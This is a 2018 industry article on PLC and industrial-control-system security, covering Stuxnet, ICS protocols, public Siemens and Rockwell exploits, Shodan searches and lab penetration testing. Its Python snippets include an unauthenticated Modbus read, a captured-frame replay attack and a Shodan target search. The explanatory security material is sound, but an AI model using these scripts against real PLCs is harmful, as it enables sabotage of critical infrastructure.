
More exploits: the great PLC hack

Oct. 25, 2018
Vulnerabilities of industrial control systems

Industrial control systems and other operational technology (OT) make up the bulk of the industrial systems and critical infrastructure used to distribute power, manufacture cars, control water flow in hydroelectric plants and run trains and subways. These systems are the core of our modern digitalized society, and, without their proper functioning, trains could collide, we could be left without electricity, dams could overflow, and robots could destroy cars during manufacturing.

Enormous numbers of insecure industrial control systems and OT systems exist around the world, and many of these systems are built around programmable logic controllers (PLCs). PLCs are the components that manage and control the various steps in a manufacturing process and heavy machinery such as the top drive on an offshore drilling rig. PLCs are essential for industrial control systems and OT systems. From a cybersecurity perspective, the interesting questions are whether it is possible to take control of a PLC, what damage could be inflicted by doing so and whether the PLC could be controlled remotely via the Internet.

The Stuxnet worm

To illustrate both how to attack a PLC and what the consequences of such an attack could be, let us look at the Stuxnet worm. Stuxnet is a stand-alone computer worm that targeted only Siemens’ supervisory control and data acquisition (SCADA) systems. The worm was designed to attack specific Siemens PLCs and made use of four zero-day vulnerabilities. The final version of Stuxnet was first identified in Belarus in June 2010 by Sergey Ulasen, then at the Belarusian antivirus company VirusBlokAda, who later joined Kaspersky Lab. An earlier version of Stuxnet had already been circulating in 2009, and the worm may have been in development as early as 2005. Stuxnet was designed mainly to harm the uranium-enrichment facility at Natanz, Iran. Unfortunately, Stuxnet spread to more than 115 countries, which illustrates how even a targeted attack can spread and cause damage beyond its core purpose.

The worm was specially constructed to change the rotor speed of the centrifuges inside the Natanz facility, eventually destroying them. What is interesting about Stuxnet is that it was a targeted worm, carefully designed to cause harm only if certain criteria were met, which means that most infected plants would not be harmed. In fact, Stuxnet would increase the rotor speed of the centrifuges only if the industrial control system’s architecture matched that of the Natanz facility. Due to its design and complexity, Stuxnet has been classified as an advanced persistent threat (APT). An APT collects data and executes commands continuously over a long period of time without detection, which is also known as a “low and slow” attack.

The Stuxnet worm was brought into the Natanz facility on a USB flash drive, enabling it to attack the system from the inside. This was a prerequisite for the attack, as the facility had no remote connection and was not directly accessible from the Internet. Once the facility was infected, the worm first executed locally on the infected host, although it did not actually do anything to that host.

After execution, the worm spread across the entire network until it found a Windows machine running STEP 7, the Siemens programming software for Siemens PLCs. The computer running STEP 7 is known as the control computer and directly interacts with and gives commands to the PLC. Once it reached the STEP 7 control computer, Stuxnet manipulated the code blocks sent from the control computer, executed dangerous commands on the PLC and made the centrifuges spin at a higher frequency than originally programmed. The attacks on the PLC were executed only approximately every 27 days to keep the attack stealthy and difficult to detect, which indeed is a central part of an APT. Stuxnet also took over the control computer and displayed false output in the STEP 7 software. This deception was a core part of the attack: the engineers at the plant received no indication of errors and assumed the centrifuges were spinning at the correct frequency. Fed false output in STEP 7, the engineers would attribute the centrifuge failures to human error rather than malware and act accordingly. Stuxnet also hid code directly on the PLC after infection and has therefore also been described as a PLC rootkit.

One of the zero-day vulnerabilities used by Stuxnet targeted Windows operating systems. It spread through the server-message-block (SMB) file-sharing protocol, as documented in the vulnerability report CVE-2008-4250 in the National Vulnerability Database. The vulnerability allowed remote code execution, letting the worm spread aggressively across the local network. The worm had several other features: it replicated itself, updated itself through a command-and-control server, contained a Windows rootkit that hid its binaries and attempted to bypass security products.

Stuxnet is known as the world’s first digital weapon and destroyed approximately 1,000 centrifuges inside the Natanz facility. A cyber attack causing physical damage revolutionized how cybersecurity experts perform threat analysis, as well as how PLC vendors design PLCs.

Hacking PLCs

Part of Stuxnet’s approach was to use the targeted PLCs as a hacking tool by means of a PLC rootkit and by manipulating the communication between the control computer and the PLC. By targeting both the control computer and the PLC, Stuxnet succeeded in achieving its goal and at the same time deceived the operators, buying enough time to destroy the centrifuges. An APT such as Stuxnet is a sophisticated attack that requires both significant intelligence-gathering and resources to execute. It also requires insight into the proprietary communication protocols in use and into the architecture of the targeted PLCs, especially for crafting the PLC rootkit.

What makes Stuxnet so interesting is that its code is now publicly available and can be reused in other attacks. Stuxnet has also led to a significant increase in the number of available hacking courses for PLCs and industrial control systems. It is possible to take a course and learn how to hack PLCs and industrial control systems, in addition to how to use publicly available hacking tools such as the Metasploit framework.

An industrial control system (ICS) and a PLC make use of multiple communication protocols; some of the most common are Profinet, Profibus and Modbus. Most ICS protocols were designed without any built-in security measures, and the lack of authentication and encryption can allow remote code execution, packet sniffing and replay attacks.

Profinet, or industrial Ethernet, uses the traditional Ethernet hardware, which makes it compatible with most equipment. Profinet is widely used in the automation industry, and its design is based on the Open Systems Interconnection (OSI) model. Profinet enables bi-directional communication and is the preferred communication protocol for the Siemens Simatic PLCs.

Profibus is an international fieldbus communication standard. It is used to link several devices together and allows bi-directional communication. There are two types of Profibus—Profibus Decentralized Peripherals (DP) and Profibus Process Automation (PA). One limitation with Profibus is that it is only able to communicate with one device at a time. The new version of Profibus is standardized in IEC 61158.

Modbus is a serial communications protocol that was designed and published by Modicon (now Schneider Electric) in 1979. Modbus communication is referred to as master and slave, since one master can address up to 247 slave devices. The control computer—HMI/engineering workstation—would typically be the master, while the automation devices, or PLCs, are the slaves. Modbus was originally designed as a communication protocol for PLCs and later became a widely used standard for connecting multiple industrial devices. It is easy to deploy, cheap and designed for SCADA systems. There are three variations of the Modbus protocol: American Standard Code for Information Interchange (ASCII), remote terminal unit (RTU) and transmission control protocol/Internet protocol (TCP/IP).
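
To make the master/slave exchange concrete, the following is a minimal sketch, in Python with raw sockets, of the Modbus/TCP "read holding registers" request a master sends to a slave. The IP address, unit ID and register range are placeholders for a lab device, not values taken from any system described in this article; because the protocol has no authentication, any client that can reach the device can issue the same request as the legitimate master.

# Minimal sketch: a Modbus/TCP "read holding registers" request built by hand.
# The address, port, unit ID and register range are placeholders for a lab device.
import socket
import struct

PLC_IP = "192.168.0.10"   # hypothetical lab PLC
PLC_PORT = 502            # default Modbus/TCP port
UNIT_ID = 1               # slave address (1-247)

def read_holding_registers(start, count):
    pdu = struct.pack(">BHH", 0x03, start, count)             # function code 0x03 + start address + quantity
    mbap = struct.pack(">HHHB", 1, 0, len(pdu) + 1, UNIT_ID)  # transaction ID, protocol ID, length, unit ID
    with socket.create_connection((PLC_IP, PLC_PORT), timeout=3) as s:
        s.sendall(mbap + pdu)                                  # no authentication is required
        response = s.recv(1024)
    byte_count = response[8]                                   # skip the 7-byte MBAP header and function code
    return struct.unpack(">" + "H" * (byte_count // 2), response[9:9 + byte_count])

print(read_holding_registers(0, 10))                           # read registers 0-9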

Modbus/TCP communicates over TCP port 502 by default and is mostly used by Schneider Electric devices. There are several Metasploit scanners that allow detection and exploitation of Modbus, and Profinet scanners are also available in the Metasploit framework. Similar scanners coded in Python can be found on GitHub. In 2011, Dillon Beresford, senior vulnerability research engineer at Dell, released remote exploits against Siemens’ Simatic PLC series. These exploits targeted the S7 communication service (ISO-TSAP), which listens on TCP port 102.

What is interesting about these exploits is that they can dump and view memory and even issue on and off commands to the PLC’s central processing unit (CPU). An example is the remote-memory-viewer exploit, which authenticates using a hard-coded backdoor password in Siemens’ Simatic S7-300 PLC. In this exploit, the CPU start/stop module sends shellcode to the PLC and turns it on or off remotely. The same start/stop exploit exists for the S7-1200 series. Furthermore, by injecting shellcode, it is also possible to gain remote access to the PLC.

Due to the lack of integrity checks, older PLCs execute commands whether or not they are delivered from a legitimate source; nothing in the network packets proves who sent them. A range of replay attacks has been shown to work against a large number of PLCs, allowing an attacker to send execution commands remotely. Exploiting PLCs remotely with open-source tools is therefore a major threat to SCADA systems. One of many reasons this is a huge problem is that, if SCADA systems are suddenly turned off, the consequences for critical infrastructure can be severe. Many SCADA systems depend on soft, controlled shutdowns to avoid damaging mechanical equipment. On the bright side, these exploits have helped to raise awareness of cybersecurity in critical infrastructure.
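
To illustrate why the missing integrity checks matter, here is a minimal replay sketch, assuming a command frame has already been captured from legitimate traffic. The target address and the hex bytes below are placeholders, not a real capture; the point is only that the frame can be resent verbatim, and the device has no way to tell it apart from a frame sent by the legitimate engineering workstation.

# Minimal replay sketch: resend a previously captured command frame verbatim.
# The address and the frame bytes are placeholders, not a real capture.
import socket

PLC_IP = "192.168.0.10"                                      # hypothetical lab PLC
PLC_PORT = 502                                               # port observed in the capture
CAPTURED_FRAME = bytes.fromhex("000100000006010500010000")   # placeholder captured frame

with socket.create_connection((PLC_IP, PLC_PORT), timeout=3) as s:
    s.sendall(CAPTURED_FRAME)          # replayed command, indistinguishable from the original
    print(s.recv(1024).hex())          # device responds as if the master had sent it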

During Black Hat USA in 2011, Beresford gave a live demo of these attacks against Siemens’ Simatic S7-300 and S7-1200 series. The exploits used in the demo were written in Ruby and made compatible with the Metasploit framework. Other open-source tools, such as plcscan, are also available for anyone to download and use against industrial control systems.

Remote exploits on ICS were an essential part of the Stuxnet worm. However, Beresford showed how it is possible to gain remote access to a PLC by using the hard-coded password integrated into the software, which takes things one step further than what was done in Stuxnet.

This is not purely a Siemens issue; Rockwell Automation has also experienced a stack-based buffer overflow that could allow remote access to the system by injecting arbitrary code, according to CVE-2016-0868 in the National Vulnerability Database. The vulnerability was reported January 26, 2016, and affected the MicroLogix 1100 PLC. In addition, several other exploits and scanners available in the Metasploit project can be used to remotely execute commands on different PLC models.

The control computer can also be used as a hacking tool, mainly because of various software exploits, some of which enable an attacker to take control of the engineering workstation in a SCADA system or ICS. This enables the attacker to pivot or manipulate the data sent to the PLC. An exploit created by James Fitts, a contributor to the Exploit Database, allows a remote attacker to inject arbitrary code into Fatek’s PLC programming software, WinProladder, as documented in CVE-2016-8377 in the National Vulnerability Database.

Even though the attacker can trigger the exploit remotely, it still requires user interaction, such as visiting a malicious Web page or opening an infected file, to take advantage of the exploit successfully. The exploit is a stack-based overflow and is available in Ruby for Metasploit import. Applications written in C are often more vulnerable to buffer overflows than applications written in other languages, and many C-based software packages are in use in industrial control systems. For example, injecting shellcode through a buffer-overflow vulnerability can grant remote access to the system; it can also be used for privilege escalation.

Shodan and Internet-facing PLCs

Shodan is a search engine that is widely used by security experts and hackers to find devices on the Internet. By using certain search terms, it is possible to find PLCs connected directly to the Internet. A search for “Simatic” performed on March 2, 2018, returned a total of 1,737 ICS devices.
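
Such a search is easy to script. Below is a minimal sketch using the official Shodan Python library (the shodan package on PyPI); the API key is a placeholder, and the query mirrors the “Simatic” search described above.

# Minimal sketch: scripting a Shodan search for Internet-facing Simatic devices.
# Requires the shodan package (pip install shodan); the API key is a placeholder.
import shodan

api = shodan.Shodan("YOUR_SHODAN_API_KEY")
results = api.search("Simatic")
print("Devices found:", results["total"])
for match in results["matches"][:10]:          # print the first few hits
    print(match["ip_str"], match.get("port"), match.get("org"))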

Having an ICS reachable from the Internet represents a severe risk of exploitation, which could lead to remote access, sabotage and espionage. For example, automated scanning based on search results from Shodan could identify potential targets and eventually provide an entry point into a specific critical-infrastructure system or ICS. Furthermore, combining a Shodan search script with code from Stuxnet could pose a major risk for anyone with PLCs reachable either indirectly or directly from the Internet.

Are we screwed?

The lack of security in industrial control systems is a major concern for national security. The PLC was originally designed to function only as an automatic operator in an industrial control system, not to be connected to external components and reachable from the Internet. However, the evolution of ICS design has started to expose PLCs to the Internet, as searches with tools such as Shodan show. PLCs have traditionally relied on air-gapped networks and restricted physical access as their security measures.

Air-gapped networks have repeatedly been shown to be a flawed design and are under no circumstances a legitimate security argument in a modern ICS. This was proven by the Stuxnet attack, which spread to more than 115 countries and infected critical infrastructure worldwide, even though most control systems were in principle designed as air-gapped. This change in ICS and critical-infrastructure environments means PLCs are exposed to a larger security threat than before.

Penetration testing

Securing an ICS environment, including the PLCs, is nontrivial, as these systems were not designed to be cyber-resilient. This means that cybersecurity resilience measures somehow have to be integrated into and around the ICS. Such measures include perimeter defense, such as firewalls, to reduce the risk of unwanted network traffic; network monitoring, preferably non-intrusive, ICS-specific, anomaly-based network monitoring, as such systems are designed not to pose any additional load on ICS networks; and, last but not least, endpoint protection and monitoring to reduce the exposure PLCs have to attacks via remote connections and to detect any sign of attack as early as possible. The latter requires some sort of ICS-specific endpoint protection and monitoring. But another very important aspect is to identify and understand the risks: What are the attack surfaces, attack methods and potential consequences? Additionally, it is important to evaluate and continuously re-evaluate the likelihood of potential attacks.

One method to gain insight into the risk exposure is penetration testing, where the goal is to identify attack vectors and to test them either on paper or in practice, that is, to attack the system. However, penetration testing in an ICS environment requires a careful approach that is significantly different from standard penetration-testing techniques for IT systems. Industrial control systems contain sensitive equipment, such as PLCs. These devices have limited processing capacity and weak network-stack implementations, so stressing them may lead to freezing, configuration resets and faults.

Standard penetration-testing activity, such as a simple port scan performed by a tool such as Nmap, might be enough to overload the processing unit. Due to weak network-stack handling, certain devices cannot handle the number of network packets generated by Nmap and similar tools. Therefore, it is best practice not to perform penetration testing on a live ICS environment; ICS penetration testing should be performed only in a controlled lab environment.

There are many penetration-testing methodologies to choose from, although few are tailored for ICS. One ICS-friendly methodology is the zero-entry methodology for penetration testing, which comprises four steps: reconnaissance, scanning, exploitation and post-exploitation.

Post-exploitation might involve maintaining access to the system, which is what an APT does when establishing a path for command-and-control communication, used to send intelligence about the target system back to the attacker and to upload new exploits and malware. Furthermore, in many sophisticated attacks, covering one’s tracks to hide the attack steps constitutes a fifth step.

Reconnaissance focuses on gathering information about the target, such as IP addresses and domain-name-system (DNS) records, and reading about common vulnerabilities for the target PLCs. Scanning involves actively scanning the target for open ports, detecting the operating system and identifying running services.

Nmap, including the Nmap Scripting Engine (NSE), is an example of a tool that is often used for scanning. If a vulnerability is found, the attack moves on to exploitation. In most cases, such vulnerabilities are used to gain access to the system through different services running on the PLC. After exploiting the vulnerability, it is preferable to make the access persistent. However, not all services give the opportunity to create a persistent backdoor.

For many PLCs, it is possible to extract details about the device using a controlled Nmap scan. This must be performed with care to avoid interrupting the PLC. We have a lab setup where we perform controlled penetration testing on PLCs and other ICS equipment.
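
As a minimal illustration of what a controlled probe might look like, the sketch below checks a handful of common PLC ports one at a time, with a pause between probes, so the PLC’s limited network stack is not flooded. The target address is a placeholder, and the actual testing described here was performed with Nmap and NSE scripts.

# Minimal sketch: a deliberately slow TCP connect probe of a few common PLC ports.
# The target address is a placeholder for a lab device.
import socket
import time

PLC_IP = "192.168.0.10"          # hypothetical lab PLC
PORTS = [80, 102, 443]           # HTTP, S7 communication (ISO-TSAP), HTTPS

for port in PORTS:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(2)
    state = "open" if s.connect_ex((PLC_IP, port)) == 0 else "closed/filtered"
    s.close()
    print(f"Port {port}: {state}")
    time.sleep(1.0)              # throttle probes so the PLC is not stressed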

In one of our penetration tests, the Nmap scan revealed the MAC address and hardware and firmware information (Figure 1). The scan also revealed that ports 80, 102 and 443 were open. By using different scripts in the Nmap Scripting Engine (NSE), we were able to extract detailed information about the firmware, hardware, MAC address and serial number. This detailed information can be used to develop exploits and to investigate vulnerabilities in the specific PLC series.

Figure 1: Nmap scan. Detailed information can be used to develop exploits and to investigate vulnerabilities in the specific PLC series.

We used the results from the Nmap scan to investigate vulnerabilities, many of which are reported and discussed in the National Vulnerability Database. After discovering and exploiting vulnerabilities, it is in many cases possible to crack the password, gain access to the PLC and shut it down.

Bibliography

Langner, R. 2013. To kill a centrifuge. The Langner Group, Tech. Rep. https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

Mueller, P. and Yadegari, B. 2012. The Stuxnet Worm. Department of Computer Science, University of Arizona. https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2013/Resources/presentations/2012/topic9-final/report.pdf

Falliere, N., Murchu, L. O. and Chien, E. 2011. W32.Stuxnet Dossier. White paper, Symantec Corp., Security Response.

Hu, P., Li, H., Fu, H., Cansever, D. and Mohapatra, P. 2015. Dynamic defense strategy against advanced persistent threat with insiders. 2015 IEEE Conference on Computer Communications (INFOCOM), 747-755.

Falliere, N. 2010. Exploring Stuxnet’s PLC Infection Process. Symantec blog entry. http://daveschull.com/wp-content/uploads/2015/05/Exploring-Stuxnet.pdf

National Vulnerability Database. 2008. CVE-2008-4250 Detail. https://nvd.nist.gov/vuln/detail/cve-2008-4250

Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. 2010. Stuxnet under the microscope. ESET (September 2010). http://www.rpac.in/image/ITR%201.pdf

Denning, D. E. 2012. Stuxnet: What has changed? Future Internet, 4, 672-687. http://www.mdpi.com/1999-5903/4/3/672/htm

Fidler, D. P. 2011. Was Stuxnet an act of war? Decoding a cyberattack. IEEE Security & Privacy, 9, 56-59. https://pdfs.semanticscholar.org/8182/ff717efd66ac92b870d0cd47a4194d4e6aa6.pdf

Chen, T. M. and Abu-Nimeh, S. 2011. Lessons from Stuxnet. Computer, 44, 91-93. http://openaccess.city.ac.uk/8203/1/ieee-computer-april-2011.pdf

Kennedy, D., O'Gorman, J., Kearns, D. and Aharoni, M. 2011. Metasploit: The Penetration Tester's Guide. No Starch Press.

Stouffer, K., Falco, J. and Scarfone, K. 2011. Guide to industrial control systems (ICS) security. NIST Special Publication 800-82. http://www.gocs.com.de/pages/fachberichte/archiv/164-sp800_82_r2_draft.pdf

Beresford, D. 2011. Exploiting Siemens Simatic S7 PLCs. Black Hat USA 2011, Las Vegas.

Briscoe, N. 2000. Understanding the OSI 7-layer model. PC Network Advisor, 120.

Siemens. 2017. S7-1200 Communication. Siemens. https://w3.siemens.com/mcms/programmable-logic-controller/en/basic-controller/s7-1200/communication/pages/default_vor_tabs.aspx#Description

Igure, V. M., Laughter, S. A. and Williams, R. D. 2006. Security issues in SCADA networks. Computers & Security, 25, 498-506. https://pdfs.semanticscholar.org/ea0d/2e22439c0dac5c667bdb9b8344e281cc7dac.pdf

Profibus. 2017. Profibus standardized in IEC 61158. https://www.profibus.com/technology/profibus/

Panchal, P. and Patel, A. 2015. Interfacing of PLC with NI-LabVIEW using Modbus Protocol. ETCEE-2015, 54. https://www.researchgate.net/profile/Alpesh_Patel16/publication/282986115_PI_control_of_level_control_system_using_PLC_and_LabVIEW_based_SCADA/links/570e117608ae3199889cb0d4.pdf

Bodungen, C., Singer, B., Shbeeb, A., Hilt, S. and Wilhoit, K. 2016. Hacking Exposed Industrial Control Systems: ICS and SCADA Security Secrets & Solutions. McGraw-Hill Education.

Wilhoit, K. 2013. Who’s Really Attacking Your ICS Equipment? Trend Micro, 10.

National Vulnerability Database. 2016. CVE-2016-0868 Detail. https://nvd.nist.gov/vuln/detail/CVE-2016-0868

National Vulnerability Database. 2016. CVE-2016-8377 Detail. https://nvd.nist.gov/vuln/detail/CVE-2016-8377

Black, P. E. and Bojanova, I. 2016. Defeating Buffer Overflow: A Trivial but Dangerous Bug. IT professional, 18, 58-61.

Shodan. 2017. What is Shodan? Shodan. https://help.shodan.io/the-basics/what-is-shodan

Ercolani, V. 2017. A Survey of Shodan Data. University of Arizona.

Engebretson, P. 2013. The basics of hacking and penetration testing, Waltham, Syngress.

Regalado, D., Harris, S., Harper, A., Eagle, C., Ness, J., Spasojevic, B., Linn, R. and Sims, S. 2015. Gray Hat Hacking: The Ethical Hacker's Handbook. McGraw-Hill Education.

About the author: Dr. Siv Hilde Houmb
Dr. Siv Hilde Houmb is associate professor at the Norwegian University of Science and Technology (NTNU) in Gjøvik, Norway. She has a Ph.D. in computer science, focusing on cybersecurity and decision theory, and is the CTO of Secure-NOK, which she founded in 2010. She has an extensive background in controls security and cybersecurity, including penetration testing, risk assessment, security protocol development and ethical hacking. She’s published more than 50 scientific papers and articles on cybersecurity and risk assessment.

Dr. Houmb worked as a security specialist and risk analyst at Telenor from 1999 to 2011, was a guest researcher at Colorado State University from 2004 to 2006 and held a post-doctoral position at the University of Twente in the Netherlands from 2007 to 2008. She has served as a security specialist for the European Telecommunications Standards Institute (ETSI) and the European Commission (EC) on topics such as RFID, car-to-car communications, privacy impact assessments, risk assessment and security evaluations of new and emerging ICT technologies. Dr. Houmb leads the cybersecurity committee at the International Association of Drilling Contractors (IADC) and works with the U.S. Coast Guard (USCG) and the National Institute of Standards and Technology (NIST) on cybersecurity standardization and regulation in oil and gas, maritime and critical manufacturing. Dr. Houmb is also the editor of the first two international cybersecurity guidelines for the drilling industry, published by IADC.

About the author: Erik David Martin
Erik David Martin is an IT security student at Noroff Education in Stavanger, Norway. He is currently working on a bachelor’s degree in computer security and will finish his degree at the University of South Wales. He collaborated with Dr. Houmb on his end-of-semester thesis in 2018, which focused on hacking and exploitation of PLCs. Martin had a summer internship at Secure-NOK AS shortly after finishing the thesis. The internship involved further security research on PLCs and building a demo kit to be used for demonstrations at security conferences and exhibition stands. The demo kit involved a Python-based GUI program that automatically attacked a PLC through its graphical interface and different communication libraries. He has also contributed to the Exploit Database by finding a vulnerability and submitting a Python-based exploit.